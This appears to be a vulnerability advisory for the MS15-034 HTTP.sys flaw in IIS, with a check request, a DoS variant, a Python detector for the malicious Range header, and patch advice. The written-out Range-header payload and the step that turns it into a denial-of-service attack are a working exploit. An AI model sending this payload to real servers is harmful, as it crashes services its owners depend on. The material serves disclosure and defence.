HTTP.sys (IIS) DoS And Remote Code Execution

Description:

Denial of Service (DoS) exploits are widely available for CVE-2015-1635, a vulnerability in HTTP.sys that affects Internet Information Server (IIS). The patch was released on Tuesday (April 14th) as part of Microsoft's Patch Tuesday.
Because this vulnerability is so easy to exploit, we recommend that you expedite patching it.

Risk: Critical
CVSS Score: 10.0
CVE: CVE-2015-1635

Proof of Concept: 

Method 1:

Download the nmap script from https://github.com/pr4jwal/quick-scripts/blob/master/ms15-034.nse and save the file in the nmap scripts folder (/usr/share/nmap/scripts/). If the server is vulnerable, the script output will show the following.





Method 2:
Send the following request to your IIS server:
GET / HTTP/1.1
Host: MS15034
Range: bytes=0-18446744073709551615
If the server responds with "Requested Header Range Not Satisfiable", then you may be vulnerable.


To launch a Denial of Service (DoS) attack:
In the example PoC above, change the "0-" to "20-" (the value has to be smaller than the size of the file retrieved, but larger than 0).
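
To spot either of the requests above in captured traffic or at a reverse proxy, the Range header can be parsed and any end offset near 18446744073709551615 flagged. The following is an added example, not code from the original post; the function names and the 2**63 cutoff are assumptions, and the sample requests are constructed.

```python
import re

UINT64_MAX = 2**64 - 1   # 18446744073709551615, the end offset in the request above
SUSPICIOUS_END = 2**63   # assumed cutoff: no real file offset gets this large

_RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def suspicious_ranges(header_value):
    """Return (first, last) pairs from a Range header value whose end
    value is at or above SUSPICIOUS_END."""
    unit, sep, specs = header_value.partition("=")
    if not sep or unit.strip().lower() != "bytes":
        return []
    hits = []
    for spec in specs.split(","):
        m = _RANGE_SPEC.match(spec)
        if not m or not m.group(2):
            continue  # malformed, or open-ended such as "500-"
        # first is None for a suffix range such as "-500"
        first = int(m.group(1)) if m.group(1) else None
        last = int(m.group(2))
        if last >= SUSPICIOUS_END:
            hits.append((first, last))
    return hits


def scan_request(raw_request):
    """Scan the header block of a raw HTTP request for suspicious ranges."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.replace("\r\n", "\n").split("\n")[1:]:  # skip request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "range":
            hits.extend(suspicious_ranges(value.strip()))
    return hits


if __name__ == "__main__":
    # Constructed sample requests: the check, the DoS variant, a normal download.
    samples = [
        "GET / HTTP/1.1\r\nHost: MS15034\r\nRange: bytes=0-18446744073709551615\r\n\r\n",
        "GET / HTTP/1.1\r\nHost: MS15034\r\nRange: bytes=20-18446744073709551615\r\n\r\n",
        "GET /file.zip HTTP/1.1\r\nHost: example.test\r\nRange: bytes=0-1023\r\n\r\n",
    ]
    for raw in samples:
        print(raw.splitlines()[2], "->", scan_request(raw) or "ok")
```

The same comparison can be used on already-patched servers to log or block scanning attempts before they reach IIS.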

Solutions:
Update Windows or apply the Windows patches on all Windows servers immediately.
The following screenshot shows that the appropriate patch for MS15-034 is installed:




